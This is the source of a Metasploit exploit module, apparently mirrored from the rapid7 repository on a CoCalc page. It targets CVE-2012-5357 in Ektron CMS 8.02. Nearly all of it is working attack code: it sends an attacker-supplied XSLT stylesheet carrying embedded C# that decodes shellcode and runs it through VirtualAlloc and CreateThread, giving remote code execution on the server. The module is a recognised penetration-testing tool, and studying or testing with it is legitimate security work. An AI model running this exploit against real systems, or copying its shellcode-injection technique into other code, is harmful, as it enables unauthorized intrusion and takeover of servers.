Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec.rb
19513 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::EXE
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',
17
'Description' => %q{
18
This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
19
vulnerability exists due to the insecure usage of XslCompiledTransform, using a
20
XSLT controlled by the user. The module has been tested successfully on Ektron CMS
21
8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
22
SERVICE privileges.
23
},
24
'Author' => [
25
'Rich Lundeen', # Vulnerability discovery
26
'juan vazquez', # Metasploit module
27
'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread
28
],
29
'License' => MSF_LICENSE,
30
'References' => [
31
[ 'CVE', '2012-5357'],
32
[ 'OSVDB', '88107' ],
33
[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
34
[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
35
],
36
'Payload' => {
37
'Space' => 2048,
38
'StackAdjustment' => -3500
39
},
40
'Platform' => 'win',
41
'Privileged' => true,
42
'Targets' => [
43
['Windows 2003 SP2 / Ektron CMS400 8.02', {}],
44
],
45
'DefaultTarget' => 0,
46
'DisclosureDate' => '2012-10-16',
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
55
register_options(
56
[
57
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
58
OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
59
]
60
)
61
end
62
63
def check
64
fingerprint = rand_text_alpha(5 + rand(5))
65
xslt_data = <<~XSLT
66
<?xml version='1.0'?>
67
<xsl:stylesheet version="1.0"
68
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
69
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
70
xmlns:user="http://mycompany.com/mynamespace">
71
<msxsl:script language="C#" implements-prefix="user">
72
<![CDATA[
73
public string xml()
74
{
75
return "#{fingerprint}";
76
}
77
]]>
78
</msxsl:script>
79
<xsl:template match="/">
80
<xsl:value-of select="user:xml()"/>
81
</xsl:template>
82
</xsl:stylesheet>
83
XSLT
84
85
res = send_request_cgi(
86
{
87
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
88
'version' => '1.1',
89
'method' => 'POST',
90
'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
91
'headers' => {
92
"Referer" => build_referer
93
},
94
'vars_post' => {
95
"xml" => rand_text_alpha(5 + rand(5)),
96
"xslt" => xslt_data
97
}
98
}
99
)
100
101
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
102
return Exploit::CheckCode::Vulnerable
103
end
104
105
return Exploit::CheckCode::Safe
106
end
107
108
def uri_path
109
uri_path = target_uri.path
110
uri_path << "/" if uri_path[-1, 1] != "/"
111
uri_path
112
end
113
114
def build_referer
115
if datastore['SSL']
116
schema = "https://"
117
else
118
schema = "http://"
119
end
120
121
referer = schema
122
referer << rhost
123
referer << ":#{rport}"
124
referer << uri_path
125
referer
126
end
127
128
def exploit
129
print_status("Generating the EXE Payload and the XSLT...")
130
fingerprint = rand_text_alpha(5 + rand(5))
131
132
xslt_data = <<~XSLT
133
<?xml version='1.0'?>
134
<xsl:stylesheet version="1.0"
135
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
136
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
137
xmlns:user="http://mycompany.com/mynamespace">
138
<msxsl:script language="C#" implements-prefix="user">
139
<![CDATA[
140
141
private static UInt32 MEM_COMMIT = 0x1000;
142
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
143
144
[System.Runtime.InteropServices.DllImport("kernel32")]
145
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
146
147
[System.Runtime.InteropServices.DllImport("kernel32")]
148
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
149
150
public string xml()
151
{
152
string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
153
byte[] shellcode = System.Convert.FromBase64String(shellcode64);
154
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
155
System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
156
IntPtr hThread = IntPtr.Zero;
157
IntPtr pinfo = IntPtr.Zero;
158
UInt32 threadId = 0;
159
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
160
return "#{fingerprint}";
161
}
162
]]>
163
</msxsl:script>
164
<xsl:template match="/">
165
<xsl:value-of select="user:xml()"/>
166
</xsl:template>
167
</xsl:stylesheet>
168
XSLT
169
170
print_status("Trying to run the xslt transformation...")
171
res = send_request_cgi(
172
{
173
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
174
'version' => '1.1',
175
'method' => 'POST',
176
'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
177
'headers' => {
178
"Referer" => build_referer
179
},
180
'vars_post' => {
181
"xml" => rand_text_alpha(5 + rand(5)),
182
"xslt" => xslt_data
183
}
184
}
185
)
186
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
187
print_good("Exploitation was successful")
188
else
189
fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
190
end
191
end
192
end
193
194